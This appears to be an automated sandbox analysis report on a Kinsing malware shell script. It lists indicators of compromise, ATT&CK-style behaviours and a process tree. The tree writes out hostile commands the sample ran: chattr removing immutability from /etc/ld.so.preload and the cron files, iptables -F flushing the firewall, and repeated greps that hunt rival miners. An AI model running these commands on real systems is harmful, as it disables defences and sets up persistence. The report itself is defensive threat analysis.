Analysis
-
max time kernel
55s -
max time network
144s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
24/02/2025, 02:43
Static task
static1
Behavioral task
behavioral1
Sample
3a4a73b5ba3c3b7b287890d97fe331f5381b4c52622f08fe132187f2484d905f.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
3a4a73b5ba3c3b7b287890d97fe331f5381b4c52622f08fe132187f2484d905f.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
3a4a73b5ba3c3b7b287890d97fe331f5381b4c52622f08fe132187f2484d905f.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
3a4a73b5ba3c3b7b287890d97fe331f5381b4c52622f08fe132187f2484d905f.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
3a4a73b5ba3c3b7b287890d97fe331f5381b4c52622f08fe132187f2484d905f.sh
-
Size
15KB
-
MD5
d4fa7dbafd91f905c97d3cad3be4cb5e
-
SHA1
b8caf58866ca2f12ed9797e7540b84faabaf1e49
-
SHA256
3a4a73b5ba3c3b7b287890d97fe331f5381b4c52622f08fe132187f2484d905f
-
SHA512
17423d63975daca16968c3731460554406a89bba94aa97e66633e8d091f350000580fc47d450b2b3107aaadcc1b6810b6b5007f9b96899179de566fac2881a2b
-
SSDEEP
384:r5JxgzLuqlH2wx2vUaQa5/eN86704s80ooJQYgykWT4yCtvUsDjdWOoJwd:trgXux7YJDj8OoJwd
Malware Config
Signatures
-
Kinsing Rootkit
Rootkit reuses the publicly available BEURK rootkit.
-
Kinsing Rootkit payload 1 IoCs
resource yara_rule behavioral2/files/fstream-17.dat family_elf_kinsing_rootkit -
Kinsing family
-
Kinsing payload 1 IoCs
resource yara_rule behavioral2/files/fstream-16.dat family_elf_kinsing_loader -
Kinsing_rootkit family
-
Modifies the dynamic linker configuration file 2 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
description ioc Process File opened for modification /etc/ld.so.preload 3a4a73b5ba3c3b7b287890d97fe331f5381b4c52622f08fe132187f2484d905f.sh -
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1661 chmod 1666 chmod 1668 chmod 1674 chmod 1675 chmod 1648 chmod 1650 chmod 1659 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /etc/data/kinsing 1676 3a4a73b5ba3c3b7b287890d97fe331f5381b4c52622f08fe132187f2484d905f.sh -
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 661 iptables -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
pid Process 1387 sudo -
Attempts to change immutable files 50 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 1554 xargs 1555 sed 1584 xargs 1624 xargs 652 chattr 1423 xargs 1549 sed 1557 xargs 1558 sed 1561 sed 1564 sed 1576 sed 648 chattr 1396 uname 1467 xargs 1485 xargs 1492 xargs 1570 sed 1578 xargs 1582 sed 1452 xargs 1472 xargs 1572 xargs 1573 sed 1575 xargs 656 chattr 1438 xargs 1516 xargs 1581 xargs 1596 xargs 1601 xargs 1642 xargs 1447 xargs 1457 xargs 1510 xargs 1433 xargs 1462 xargs 1504 xargs 1551 xargs 1552 sed 1560 xargs 1563 xargs 1579 sed 1428 xargs 1480 xargs 1498 xargs 1566 xargs 1613 xargs 1636 xargs 1548 xargs -
Creates/modifies Cron job 1 TTPs 64 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.66rswZ crontab File opened for modification /var/spool/cron/crontabs/tmp.GX7KnQ crontab File opened for modification /var/spool/cron/crontabs/tmp.5Y7MWU crontab File opened for modification /var/spool/cron/crontabs/tmp.3AjFaT crontab File opened for modification /var/spool/cron/crontabs/tmp.D6WOqM crontab File opened for modification /var/spool/cron/crontabs/tmp.oCWMrk crontab File opened for modification /var/spool/cron/crontabs/tmp.5lXGy3 crontab File opened for modification /var/spool/cron/crontabs/tmp.0akxh3 crontab File opened for modification /var/spool/cron/crontabs/tmp.XdpXgb crontab File opened for modification /var/spool/cron/crontabs/tmp.Z9yFdC crontab File opened for modification /var/spool/cron/crontabs/tmp.2R8DIa crontab File opened for modification /var/spool/cron/crontabs/tmp.unJVEW crontab File opened for modification /var/spool/cron/crontabs/tmp.RhP098 crontab File opened for modification /var/spool/cron/crontabs/tmp.bQH2SK crontab File opened for modification /var/spool/cron/crontabs/tmp.nmcIan crontab File opened for modification /var/spool/cron/crontabs/tmp.Jpx3X5 crontab File opened for modification /var/spool/cron/crontabs/tmp.yyMg7d crontab File opened for modification /var/spool/cron/crontabs/tmp.oNrb2x crontab File opened for modification /var/spool/cron/crontabs/tmp.aZmRmN crontab File opened for modification /var/spool/cron/crontabs/tmp.NJ0b29 crontab File opened for modification /var/spool/cron/crontabs/tmp.sU6JMd crontab File opened for modification /var/spool/cron/crontabs/tmp.sjaKut crontab File opened for modification /var/spool/cron/crontabs/tmp.1Rbyi8 crontab File opened for modification /var/spool/cron/crontabs/tmp.ykJe0x crontab File opened for modification /var/spool/cron/crontabs/tmp.x0ulC5 crontab File opened for modification /var/spool/cron/crontabs/tmp.jM4Zsu crontab File opened for modification /var/spool/cron/crontabs/tmp.gXLmzf crontab File opened for modification /var/spool/cron/crontabs/tmp.fHijau crontab File opened for modification /var/spool/cron/crontabs/tmp.yYnJLR crontab File opened for modification /var/spool/cron/crontabs/tmp.jTbFIa crontab File opened for modification /var/spool/cron/crontabs/tmp.mf1G5U crontab File opened for modification /var/spool/cron/crontabs/tmp.3Cf5EO crontab File opened for modification /var/spool/cron/crontabs/tmp.wuaEpv crontab File opened for modification /var/spool/cron/crontabs/tmp.Djb2mJ crontab File opened for modification /var/spool/cron/crontabs/tmp.xg1wAt crontab File opened for modification /var/spool/cron/crontabs/tmp.EqdAOg crontab File opened for modification /var/spool/cron/crontabs/tmp.qRgcxE crontab File opened for modification /var/spool/cron/crontabs/tmp.tLEk7M crontab File opened for modification /var/spool/cron/crontabs/tmp.dmuOgr crontab File opened for modification /var/spool/cron/crontabs/tmp.4KFGZI crontab File opened for modification /var/spool/cron/crontabs/tmp.vcxxbr crontab File opened for modification /var/spool/cron/crontabs/tmp.OMR0SG crontab File opened for modification /var/spool/cron/crontabs/tmp.d5Fdaa crontab File opened for modification /var/spool/cron/crontabs/tmp.o7zIzb crontab File opened for modification /var/spool/cron/crontabs/tmp.zfBSdk crontab File opened for modification /var/spool/cron/crontabs/tmp.zCluXs crontab File opened for modification /var/spool/cron/crontabs/tmp.zkSqPk crontab File opened for modification /var/spool/cron/crontabs/tmp.XSHnuc crontab File opened for modification /var/spool/cron/crontabs/tmp.UaF33c crontab File opened for modification /var/spool/cron/crontabs/tmp.8HhBZd crontab File opened for modification /var/spool/cron/crontabs/tmp.KYtkOT crontab File opened for modification /var/spool/cron/crontabs/tmp.YrfEsm crontab File opened for modification /var/spool/cron/crontabs/tmp.mNVZn5 crontab File opened for modification /var/spool/cron/crontabs/tmp.b2iF5K crontab File opened for modification /var/spool/cron/crontabs/tmp.uCjN1h crontab File opened for modification /var/spool/cron/crontabs/tmp.gyBrVe crontab File opened for modification /var/spool/cron/crontabs/tmp.KB7X9T crontab File opened for modification /var/spool/cron/crontabs/tmp.X9mQoJ crontab File opened for modification /var/spool/cron/crontabs/tmp.VKM5eh crontab File opened for modification /var/spool/cron/crontabs/tmp.JhH8E7 crontab File opened for modification /var/spool/cron/crontabs/tmp.ODjyyj crontab File opened for modification /var/spool/cron/crontabs/tmp.khwXgG crontab File opened for modification /var/spool/cron/crontabs/tmp.1oRYnr crontab File opened for modification /var/spool/cron/crontabs/tmp.rHu54N crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /lib/systemd/system/bot.service 3a4a73b5ba3c3b7b287890d97fe331f5381b4c52622f08fe132187f2484d905f.sh -
Checks CPU configuration 1 TTPs 3 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
Process Discovery 1 TTPs 12 IoCs
Adversaries may try to discover information about running processes.
pid Process 1443 ps 1463 ps 1597 ps 1638 ps 1448 ps 1453 ps 1458 ps 1468 ps 1476 ps 1481 ps 1544 ps 1592 ps -
description ioc Process File opened for reading /proc/266/cmdline ps File opened for reading /proc/27/cmdline pkill File opened for reading /proc/sys/kernel/osrelease ps File opened for reading /proc/17/stat ps File opened for reading /proc/22/cmdline ps File opened for reading /proc/29/cmdline pkill File opened for reading /proc/169/stat ps File opened for reading /proc/147/status ps File opened for reading /proc/17/cmdline pkill File opened for reading /proc/15/status pkill File opened for reading /proc/14/cmdline pkill File opened for reading /proc/299/cmdline pkill File opened for reading /proc/185/stat ps File opened for reading /proc/filesystems ls File opened for reading /proc/646/cmdline ps File opened for reading /proc/27/cmdline pkill File opened for reading /proc/261/status ps File opened for reading /proc/295/stat ps File opened for reading /proc/580/cmdline pkill File opened for reading /proc/11/status pkill File opened for reading /proc/139/status pkill File opened for reading /proc/299/cmdline pkill File opened for reading /proc/299/cmdline pkill File opened for reading /proc/106/cmdline pkill File opened for reading /proc/1638/stat ps File opened for reading /proc/1225/cmdline pkill File opened for reading /proc/205/cmdline ps File opened for reading /proc/14/cmdline ps File opened for reading /proc/5/stat ps File opened for reading /proc/20/stat ps File opened for reading /proc/12/status ps File opened for reading /proc/1629/stat ps File opened for reading /proc/580/stat ps File opened for reading /proc/1225/cmdline pkill File opened for reading /proc/23/cmdline pkill File opened for reading /proc/646/cmdline pkill File opened for reading /proc/43/cmdline pkill File opened for reading /proc/17/cmdline pkill File opened for reading /proc/2/cmdline pkill File opened for reading /proc/147/cmdline pkill File opened for reading /proc/645/cmdline pkill File opened for reading /proc/333/stat ps File opened for reading /proc/1436/status ps File opened for reading /proc/97/cmdline ps File opened for reading /proc/299/cmdline pkill File opened for reading /proc/169/cmdline pkill File opened for reading /proc/10/status pkill File opened for reading /proc/filesystems crontab File opened for reading /proc/28/cmdline pkill File opened for reading /proc/600/status pkill File opened for reading /proc/143/stat ps File opened for reading /proc/264/cmdline ps File opened for reading /proc/299/cmdline pkill File opened for reading /proc/262/stat ps File opened for reading /proc/22/status pkill File opened for reading /proc/11/status pkill File opened for reading /proc/643/status pkill File opened for reading /proc/139/cmdline pkill File opened for reading /proc/299/cmdline pkill File opened for reading /proc/580/status ps File opened for reading /proc/24/status pkill File opened for reading /proc/filesystems crontab File opened for reading /proc/169/status pkill File opened for reading /proc/595/status pkill -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1342 ls 1780 sed
Processes
-
/tmp/3a4a73b5ba3c3b7b287890d97fe331f5381b4c52622f08fe132187f2484d905f.sh/tmp/3a4a73b5ba3c3b7b287890d97fe331f5381b4c52622f08fe132187f2484d905f.sh1⤵
- Modifies the dynamic linker configuration file
- Executes dropped EXE
- Modifies systemd
PID:646 -
/usr/bin/chattrchattr -i /etc/ld.so.preload2⤵
- Attempts to change immutable files
PID:648
-
-
/bin/rmrm -f /etc/ld.so.preload2⤵PID:650
-
-
/usr/bin/chattrchattr -R -ia /var/spool/cron2⤵
- Attempts to change immutable files
PID:652
-
-
/usr/bin/chattrchattr -ia /etc/crontab2⤵
- Attempts to change immutable files
PID:656
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:661
-
-
/bin/grepgrep exe2⤵PID:670
-
-
/bin/lsls -latrh /proc/12⤵PID:669
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:675
-
-
/bin/grepgrep exe2⤵PID:680
-
-
/bin/lsls -latrh /proc/102⤵PID:679
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:684
-
-
/bin/grepgrep exe2⤵PID:689
-
-
/bin/lsls -latrh /proc/1062⤵PID:688
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:692
-
-
/bin/grepgrep exe2⤵PID:696
-
-
/bin/lsls -latrh /proc/1082⤵PID:695
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:700
-
-
/bin/lsls -latrh /proc/1092⤵PID:702
-
-
/bin/grepgrep exe2⤵PID:703
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:706
-
-
/bin/lsls -latrh /proc/112⤵PID:708
-
-
/bin/grepgrep exe2⤵PID:709
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:712
-
-
/bin/lsls -latrh /proc/122⤵PID:714
-
-
/bin/grepgrep exe2⤵PID:715
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:717
-
-
/bin/grepgrep exe2⤵PID:720
-
-
/bin/lsls -latrh /proc/132⤵PID:719
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:722
-
-
/bin/grepgrep exe2⤵PID:725
-
-
/bin/lsls -latrh /proc/1382⤵PID:724
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:727
-
-
/bin/grepgrep exe2⤵PID:730
-
-
/bin/lsls -latrh /proc/1392⤵PID:729
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:732
-
-
/bin/lsls -latrh /proc/142⤵PID:734
-
-
/bin/grepgrep exe2⤵PID:735
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:737
-
-
/bin/lsls -latrh /proc/1432⤵PID:739
-
-
/bin/grepgrep exe2⤵PID:740
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:742
-
-
/bin/grepgrep exe2⤵PID:745
-
-
/bin/lsls -latrh /proc/1472⤵PID:744
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:747
-
-
/bin/lsls -latrh /proc/152⤵PID:749
-
-
/bin/grepgrep exe2⤵PID:750
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:752
-
-
/bin/grepgrep exe2⤵PID:757
-
-
/bin/lsls -latrh /proc/162⤵PID:756
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:759
-
-
/bin/grepgrep exe2⤵PID:764
-
-
/bin/lsls -latrh /proc/1692⤵PID:763
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:767
-
-
/bin/lsls -latrh /proc/172⤵PID:770
-
-
/bin/grepgrep exe2⤵PID:771
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:773
-
-
/bin/lsls -latrh /proc/182⤵PID:777
-
-
/bin/grepgrep exe2⤵PID:778
-
-
